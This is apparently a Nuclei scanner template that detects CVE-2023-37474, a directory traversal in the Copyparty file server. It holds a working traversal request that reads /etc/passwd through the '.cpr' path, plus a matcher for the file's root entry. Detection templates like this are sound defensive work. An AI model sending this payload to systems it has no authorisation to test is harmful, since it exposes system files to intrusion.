46 lines
1.8 KiB
YAML
46 lines
1.8 KiB
YAML
id: CVE-2023-37474
|
|
|
|
info:
|
|
name: Copyparty <= 1.8.2 - Directory Traversal
|
|
author: shankar acharya,theamanrawat
|
|
severity: high
|
|
description: |
|
|
Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory. This issue has been addressed in commit `043e3c7d` which has been included in release 1.8.2. Users are advised to upgrade. There are no known workarounds for this vulnerability.
|
|
reference:
|
|
- https://github.com/9001/copyparty/
|
|
- https://www.exploit-db.com/exploits/51636
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-37474
|
|
- http://packetstormsecurity.com/files/173822/Copyparty-1.8.2-Directory-Traversal.html
|
|
- https://github.com/9001/copyparty/commit/043e3c7dd683113e2b1c15cacb9c8e68f76513ff
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2023-37474
|
|
cwe-id: CWE-22
|
|
epss-score: 0.02398
|
|
epss-percentile: 0.88708
|
|
cpe: cpe:2.3:a:copyparty_project:copyparty:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: copyparty_project
|
|
product: copyparty
|
|
tags: packetstorm,cve,cve2023,traversal,copyparty
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/.cpr/%2Fetc%2Fpasswd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a00473045022100ab28fe2b2da89644e83c766541149633b7287c8b975ce661fd2077ecac4b821202204584739da3b8242754bee6c8e39c982080e8e71be48d862e3a28c685320fbfe7:922c64590222798bb761d5b6d8e72950
|